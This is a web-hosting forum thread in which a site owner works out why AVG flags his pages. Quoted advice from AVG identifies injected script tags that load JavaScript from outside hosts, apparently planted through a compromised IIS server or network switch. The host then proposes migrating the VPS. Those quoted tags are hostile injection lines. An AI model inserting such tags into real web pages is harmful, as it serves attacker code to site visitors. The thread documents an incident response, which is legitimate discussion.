AVG Virus Warning

[alanhay]

A number of users of a site hosted on my VPS, including myself, have suddenly started receiving warnings from AVG anti-virus that a file is infected:

FileName : www.batnigt.com/ver.htm

Threat Name : Exploit MDAC injection (type 26

I have not updated the site for some time and can find no references to a file so named. The only 3rd party scripts in use are form Yahoo and Google which I would assume are safe enough.

I'm unsure how to proceed and wonder if anyone can assist.

Thanks.


Alan

[Rock]

Hi Alan,

Are there any changes in the file stamps of the default files in your website? ie: whether they are hampered by any means, the date/time of the change will be reflected.

[alanhay]

No, I've checked that and can't see anything that's changed.

Guess I could do a fresh deployment later and see if that changes anything.

If not then I assume the issue must be with a 3rd party script or a previously clean file is now being identified as a threat for some reason. AVG have confirmed that the threat exists and is not a false positive.

Would running a virus scan on the server help, viz. if it doesn't fund anything then I could only assume the issue was with some resource served form a 3rd party server?

Are there any other tools that would help me in identifying this issue?

[Rock]

Ohh, if it isnt the files, then this can be an issue with the SQL server being infected or maybe it's just FireFox. Did you try using IE ?

[alanhay]

I get the error with both IE and Firefox.

As far as I'm aware I don't even have SQL server installed. Im certainly not using it.



Alan

[Rock]

Can you post the name of one of your hosted sites which is throwing the warning here ?

[alanhay]

Ok. I have seen it on:

www.braids-united.co.uk

I tried it work just now and FF was showing a reference to the follwing in the status bar:

js.users.51.la

js.users.51.la - hosts File Entries


??



Alan

[alanhay]

I have received some assistance from AVG who have advised me that

----------------------
Please kindly note that the positive detection is caused by the
following lines in the page source:

<script language=javascript
src=http://telecom.dgnet.net/images/pen.gif></script>;

<script language=javascript
src=hxxp://www.jalasoft.com/images/ken.gif></script>;

If the lines will be removed, then the AVG should stop detecting it.
----------------------

Sure enough looking at the source of following page there is a reference to the first item right at the top of the page.

Membership Details

Now it's not in the page source so how the hell is it getting there? Some other script I assume but I can't see anything.

[alanhay]

I have received some assistance from AVG who have advised me that

----------------------
Please kindly note that the positive detection is caused by the
following lines in the page source:

#script language=javascript
src=http://telecom.dgnet.net/images/pen.gif>#/script#

#script language=javascript
src=hxxp://www.jalasoft.com/images/ken.gif>#/script#

If the lines will be removed, then the AVG should stop detecting it.
----------------------

Sure enough looking at the source of following page there is a reference to the first item right at the top of the page.

Membership Details

Now it's not in the page source so how the hell is it getting there? Some other script I assume but I can't see anything.

[flesso]

Sounds like your server has been compromised in some way. Are you sure your scripts aren't insecure in some way?

[alanhay]

What scripts are we talking about here? Javascript?

[flesso]

What scripts are we talking about here? Javascript?

Just your dynamic web pages in general.

[alanhay]

I have identified that this is an IIS issue and that my server has been compromised somehow.

If I serve the pages directly from Tomcat then the problem disappears.

I will raise a support ticket.

[eUKShane]

Hello,

I would say rather than investigating the current issue and making it further more complicated, I think a quick solution for this problem is to create a brand new VPS and do a fresh installation for all your applications on it. You can then scan the files on your local machine and upload them on the server as per your requirement.

I know this may seem to be a time consuming task but in this way we can solve this problem permanently. There is a possibility that the Virus may have infected the system files also.

Let us know if you would like to proceed with this solution.

[alanhay]

Well, I have already had one brand new VPS since signing up with you and do not really have the time to go through the whole process again.

I believe that IIS on my server has been compromised from an external attack. What is to prevent this happening again?

[eUKhost.com]

Hi Alan,

There seems to be some problem with the Network switch which is connected to the rack of your vps node. We will need to replace the compromised network switch if the problem turns out to be with the switch or else we will need to investigate further.

Please allow our VPS team to migrate your VPS as there's no other solution to get this problem sorted quickly.

[alanhay]

Okay so you will reinstall and recongiure all applications EXACTLY as they are now, backup and restore all data including that in MySQL and Subversion, configure IIS and Tomcat Virtual Hosts etc MailServer, PHP?

[eUKhost.com]

Okay so you will reinstall and recongiure all applications EXACTLY as they are now, backup and restore all data including that in MySQL and Subversion, configure IIS and Tomcat Virtual Hosts etc MailServer, PHP?

Yes. We will make clone of your existing VPS and restore it as it is on a new node. I'm not sure why it had to be only your VPS twice in time span of 2 months, but we will try our best to avoid problems for your VPS in future.

[alanhay]

Okay but can you explain:

"There seems to be some problem with the Network switch which is connected to the rack of your vps node."

What exactly has happened here? A malicious user has managed to penetrate your network? What is to prevent this happening on the new VPS?

[vzAddict]

Hello,

Please allow us sometime as we are working on this issue. We will provide you the complete explanation as soon as the issue gets fixed.